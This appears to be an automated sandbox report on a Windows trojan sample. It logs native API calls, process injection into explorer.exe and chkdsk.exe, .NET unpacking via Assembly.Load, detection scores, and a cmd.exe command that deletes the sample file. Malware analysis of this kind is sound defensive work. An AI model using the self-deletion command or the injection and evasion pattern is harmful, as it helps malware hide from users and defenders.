Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05955630	4_2_05955630
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0591B1B0	4_2_0591B1B0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059DB16B	4_2_059DB16B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0594516C	4_2_0594516C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_058FF172	4_2_058FF172
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059170C0	4_2_059170C0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059BF0CC	4_2_059BF0CC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059C70E9	4_2_059C70E9
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059CF0E0	4_2_059CF0E0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0595739A	4_2_0595739A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059C132D	4_2_059C132D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_058FD34C	4_2_058FD34C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059152A0	4_2_059152A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0592B2C0	4_2_0592B2C0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0592D2F0	4_2_0592D2F0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059B12ED	4_2_059B12ED
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0592FDC0	4_2_0592FDC0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059C1D5A	4_2_059C1D5A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05913D40	4_2_05913D40
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059C7D73	4_2_059C7D73
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059CFCF2	4_2_059CFCF2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05989C32	4_2_05989C32
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05911F92	4_2_05911F92
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059CFFB1	4_2_059CFFB1
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_058D3FD5	4_2_058D3FD5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_058D3FD2	4_2_058D3FD2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059CFF09	4_2_059CFF09
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05919EB0	4_2_05919EB0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059A5910	4_2_059A5910
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05919950	4_2_05919950
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0592B950	4_2_0592B950
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059138E0	4_2_059138E0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0597D800	4_2_0597D800
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0592FB80	4_2_0592FB80
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05985BF0	4_2_05985BF0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0594DBF9	4_2_0594DBF9
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059CFB76	4_2_059CFB76
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05955AA0	4_2_05955AA0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059ADAAC	4_2_059ADAAC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059B1AA3	4_2_059B1AA3
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059BDAC6	4_2_059BDAC6
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059CFA49	4_2_059CFA49
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059C7A46	4_2_059C7A46
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05983A6C	4_2_05983A6C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0505E006	4_2_0505E006
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05042D87	4_2_05042D87
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05042D90	4_2_05042D90
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05042FB0	4_2_05042FB0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0505D563	4_2_0505D563
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05049E50	4_2_05049E50
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0505DE6A	4_2_0505DE6A

Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: String function: 05957E54 appears 107 times
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: String function: 0597EA12 appears 86 times
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: String function: 05945130 appears 58 times
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: String function: 058FB970 appears 262 times
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: String function: 0598F290 appears 103 times
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: String function: 01455130 appears 58 times
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: String function: 0149F290 appears 103 times
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: String function: 0148EA12 appears 86 times
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: String function: 0140B970 appears 262 times
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: String function: 01467E54 appears 107 times

Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0041A320 NtCreateFile,	2_2_0041A320
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0041A3D0 NtReadFile,	2_2_0041A3D0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0041A450 NtClose,	2_2_0041A450
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0041A500 NtAllocateVirtualMemory,	2_2_0041A500
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0041A31B NtCreateFile,	2_2_0041A31B
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0041A44A NtReadFile,NtClose,	2_2_0041A44A
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0041A4FB NtAllocateVirtualMemory,	2_2_0041A4FB
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01452B60 NtClose,LdrInitializeThunk,	2_2_01452B60
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01452BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	2_2_01452BF0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01452AD0 NtReadFile,LdrInitializeThunk,	2_2_01452AD0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01452D10 NtMapViewOfSection,LdrInitializeThunk,	2_2_01452D10
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01452D30 NtUnmapViewOfSection,LdrInitializeThunk,	2_2_01452D30
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01452DD0 NtDelayExecution,LdrInitializeThunk,	2_2_01452DD0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01452DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_01452DF0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01452C70 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_01452C70
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01452CA0 NtQueryInformationToken,LdrInitializeThunk,	2_2_01452CA0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01452F30 NtCreateSection,LdrInitializeThunk,	2_2_01452F30
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01452FE0 NtCreateFile,LdrInitializeThunk,	2_2_01452FE0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01452F90 NtProtectVirtualMemory,LdrInitializeThunk,	2_2_01452F90
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01452FB0 NtResumeThread,LdrInitializeThunk,	2_2_01452FB0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01452E80 NtReadVirtualMemory,LdrInitializeThunk,	2_2_01452E80
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01452EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	2_2_01452EA0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01454340 NtSetContextThread,	2_2_01454340
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01454650 NtSuspendThread,	2_2_01454650
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01452BE0 NtQueryValueKey,	2_2_01452BE0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01452B80 NtQueryInformationFile,	2_2_01452B80
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01452BA0 NtEnumerateValueKey,	2_2_01452BA0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01452AF0 NtWriteFile,	2_2_01452AF0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01452AB0 NtWaitForSingleObject,	2_2_01452AB0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01452D00 NtSetInformationFile,	2_2_01452D00
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01452DB0 NtEnumerateKey,	2_2_01452DB0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01452C60 NtCreateKey,	2_2_01452C60
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01452C00 NtQueryInformationProcess,	2_2_01452C00
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01452CC0 NtQueryVirtualMemory,	2_2_01452CC0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01452CF0 NtOpenProcess,	2_2_01452CF0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01452F60 NtCreateProcessEx,	2_2_01452F60
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01452FA0 NtQuerySection,	2_2_01452FA0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01452E30 NtWriteVirtualMemory,	2_2_01452E30
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01452EE0 NtQueueApcThread,	2_2_01452EE0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01453010 NtOpenDirectoryObject,	2_2_01453010
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01453090 NtSetValueKey,	2_2_01453090
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014535C0 NtCreateMutant,	2_2_014535C0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014539B0 NtGetContextThread,	2_2_014539B0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01453D70 NtOpenThread,	2_2_01453D70
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01453D10 NtOpenProcessToken,	2_2_01453D10
Source: C:\Windows\explorer.exe	Code function: 3_2_0E5D9E12 NtProtectVirtualMemory,	3_2_0E5D9E12
Source: C:\Windows\explorer.exe	Code function: 3_2_0E5D8232 NtCreateFile,	3_2_0E5D8232
Source: C:\Windows\explorer.exe	Code function: 3_2_0E5D9E0A NtProtectVirtualMemory,	3_2_0E5D9E0A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05942DD0 NtDelayExecution,LdrInitializeThunk,	4_2_05942DD0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05942DF0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_05942DF0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05942D10 NtMapViewOfSection,LdrInitializeThunk,	4_2_05942D10
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05942CA0 NtQueryInformationToken,LdrInitializeThunk,	4_2_05942CA0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05942C70 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_05942C70
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05942C60 NtCreateKey,LdrInitializeThunk,	4_2_05942C60
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05942FE0 NtCreateFile,LdrInitializeThunk,	4_2_05942FE0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05942F30 NtCreateSection,LdrInitializeThunk,	4_2_05942F30
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05942EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	4_2_05942EA0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05942BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	4_2_05942BF0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05942BE0 NtQueryValueKey,LdrInitializeThunk,	4_2_05942BE0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05942B60 NtClose,LdrInitializeThunk,	4_2_05942B60
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05942AD0 NtReadFile,LdrInitializeThunk,	4_2_05942AD0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059435C0 NtCreateMutant,LdrInitializeThunk,	4_2_059435C0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05944650 NtSuspendThread,	4_2_05944650
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05944340 NtSetContextThread,	4_2_05944340
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05942DB0 NtEnumerateKey,	4_2_05942DB0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05942D00 NtSetInformationFile,	4_2_05942D00
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05942D30 NtUnmapViewOfSection,	4_2_05942D30
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05942CC0 NtQueryVirtualMemory,	4_2_05942CC0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05942CF0 NtOpenProcess,	4_2_05942CF0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05942C00 NtQueryInformationProcess,	4_2_05942C00
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05942F90 NtProtectVirtualMemory,	4_2_05942F90
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05942FB0 NtResumeThread,	4_2_05942FB0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05942FA0 NtQuerySection,	4_2_05942FA0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05942F60 NtCreateProcessEx,	4_2_05942F60
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05942E80 NtReadVirtualMemory,	4_2_05942E80
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05942EE0 NtQueueApcThread,	4_2_05942EE0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05942E30 NtWriteVirtualMemory,	4_2_05942E30
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05942B80 NtQueryInformationFile,	4_2_05942B80
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05942BA0 NtEnumerateValueKey,	4_2_05942BA0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05942AB0 NtWaitForSingleObject,	4_2_05942AB0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05942AF0 NtWriteFile,	4_2_05942AF0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05943090 NtSetValueKey,	4_2_05943090
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05943010 NtOpenDirectoryObject,	4_2_05943010
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05943D10 NtOpenProcessToken,	4_2_05943D10
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_05943D70 NtOpenThread,	4_2_05943D70
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_059439B0 NtGetContextThread,	4_2_059439B0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0505A500 NtAllocateVirtualMemory,	4_2_0505A500
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0505A450 NtClose,	4_2_0505A450
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0505A320 NtCreateFile,	4_2_0505A320
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0505A3D0 NtReadFile,	4_2_0505A3D0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0505A44A NtReadFile,NtClose,	4_2_0505A44A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0505A4FB NtAllocateVirtualMemory,	4_2_0505A4FB
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4_2_0505A31B NtCreateFile,	4_2_0505A31B

Source: 881SP1exr1.exe, 00000000.00000002.1644302616.0000000002F44000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBen.dll@ vs 881SP1exr1.exe
Source: 881SP1exr1.exe, 00000000.00000002.1644302616.0000000002F01000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBen.dll@ vs 881SP1exr1.exe
Source: 881SP1exr1.exe, 00000000.00000002.1648665241.0000000007950000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs 881SP1exr1.exe
Source: 881SP1exr1.exe, 00000000.00000002.1642627584.0000000000FCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 881SP1exr1.exe
Source: 881SP1exr1.exe, 00000000.00000002.1646857743.0000000005930000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameBen.dll@ vs 881SP1exr1.exe
Source: 881SP1exr1.exe, 00000000.00000002.1644806070.00000000040DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs 881SP1exr1.exe
Source: 881SP1exr1.exe, 00000002.00000002.1699968102.0000000000F76000.00000040.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCHKDSK.EXEj% vs 881SP1exr1.exe
Source: 881SP1exr1.exe, 00000002.00000002.1700042258.0000000000F88000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCHKDSK.EXEj% vs 881SP1exr1.exe
Source: 881SP1exr1.exe, 00000002.00000002.1700042258.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCHKDSK.EXEj% vs 881SP1exr1.exe
Source: 881SP1exr1.exe, 00000002.00000002.1701034461.000000000150D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 881SP1exr1.exe
Source: 881SP1exr1.exe	Binary or memory string: OriginalFilenameCgWC.exeF vs 881SP1exr1.exe

Source: 881SP1exr1.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 881SP1exr1.exe	ReversingLabs: Detection: 22%
Source: 881SP1exr1.exe	Virustotal: Detection: 34%

Source: C:\Users\user\Desktop\881SP1exr1.exe

File read: C:\Users\user\Desktop\881SP1exr1.exe:Zone.Identifier

Jump to behavior

Source: 881SP1exr1.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\881SP1exr1.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\881SP1exr1.exe C:\Users\user\Desktop\881SP1exr1.exe
Source: C:\Users\user\Desktop\881SP1exr1.exe	Process created: C:\Users\user\Desktop\881SP1exr1.exe C:\Users\user\Desktop\881SP1exr1.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
Source: C:\Windows\SysWOW64\chkdsk.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\881SP1exr1.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\881SP1exr1.exe	Process created: C:\Users\user\Desktop\881SP1exr1.exe C:\Users\user\Desktop\881SP1exr1.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\881SP1exr1.exe"	Jump to behavior

Source: C:\Users\user\Desktop\881SP1exr1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\881SP1exr1.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\881SP1exr1.exe.log

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@173/1@11/10

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, QOOAOydx7dSeWpwTgP.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, QOOAOydx7dSeWpwTgP.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, D2VNgRut5RiPfAFHhQ.cs	Security API names: _0020.SetAccessControl
Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, D2VNgRut5RiPfAFHhQ.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, D2VNgRut5RiPfAFHhQ.cs	Security API names: _0020.AddAccessRule
Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, D2VNgRut5RiPfAFHhQ.cs	Security API names: _0020.SetAccessControl
Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, D2VNgRut5RiPfAFHhQ.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, D2VNgRut5RiPfAFHhQ.cs	Security API names: _0020.AddAccessRule
Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, QOOAOydx7dSeWpwTgP.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, D2VNgRut5RiPfAFHhQ.cs	Security API names: _0020.SetAccessControl
Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, D2VNgRut5RiPfAFHhQ.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, D2VNgRut5RiPfAFHhQ.cs	Security API names: _0020.AddAccessRule

Source: 881SP1exr1.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\881SP1exr1.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll			Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03

Source: C:\Users\user\Desktop\881SP1exr1.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 881SP1exr1.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 881SP1exr1.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: 881SP1exr1.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: chkdsk.pdbGCTL source: 881SP1exr1.exe, 00000002.00000002.1700042258.0000000000F88000.00000004.00000020.00020000.00000000.sdmp, 881SP1exr1.exe, 00000002.00000002.1699968102.0000000000F70000.00000040.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4088729224.0000000000330000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: chkdsk.pdb source: 881SP1exr1.exe, 00000002.00000002.1700042258.0000000000F88000.00000004.00000020.00020000.00000000.sdmp, 881SP1exr1.exe, 00000002.00000002.1699968102.0000000000F70000.00000040.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4088729224.0000000000330000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: 881SP1exr1.exe, 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000004.00000003.1699296341.0000000005574000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000004.00000003.1701280255.0000000005722000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: 881SP1exr1.exe, 881SP1exr1.exe, 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 00000004.00000003.1699296341.0000000005574000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000004.00000003.1701280255.0000000005722000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: CgWC.pdbSHA256 source: 881SP1exr1.exe
Source:	Binary string: CgWC.pdb source: 881SP1exr1.exe

Data Obfuscation

.NET source code contains potential unpacker

Source: 881SP1exr1.exe, MainForm.cs	.Net Code: InitializeComponent contains xor as well as GetObject
Source: 0.2.881SP1exr1.exe.2f52da4.1.raw.unpack, .cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, D2VNgRut5RiPfAFHhQ.cs	.Net Code: sRDWgiaYFa System.Reflection.Assembly.Load(byte[])
Source: 0.2.881SP1exr1.exe.2f25094.2.raw.unpack, .cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, D2VNgRut5RiPfAFHhQ.cs	.Net Code: sRDWgiaYFa System.Reflection.Assembly.Load(byte[])
Source: 0.2.881SP1exr1.exe.5930000.13.raw.unpack, .cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, D2VNgRut5RiPfAFHhQ.cs	.Net Code: sRDWgiaYFa System.Reflection.Assembly.Load(byte[])
Source: 3.2.explorer.exe.1128f840.0.raw.unpack, MainForm.cs	.Net Code: InitializeComponent contains xor as well as GetObject

Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 0_2_078D47EE push 0BDB0307h; ret	0_2_078D47FD
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 0_2_078D5DAA push 2C15FF07h; iretd	0_2_078D5DAF
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 0_2_078D5DBD push 2C15FF07h; iretd	0_2_078D5DC2
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 0_2_078DBD7D push FFFFFF8Bh; iretd	0_2_078DBD7F
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 0_2_078D8C05 push 8BE7EB07h; iretd	0_2_078D8C0C
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 0_2_078D4A84 push 8BD08B07h; retf	0_2_078D4A89
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0041E006 push dword ptr [DF23F5C2h]; ret	2_2_0041DE68
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_00417953 push ebp; retf	2_2_004179C2
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_004179E5 push cs; iretd	2_2_004179E6
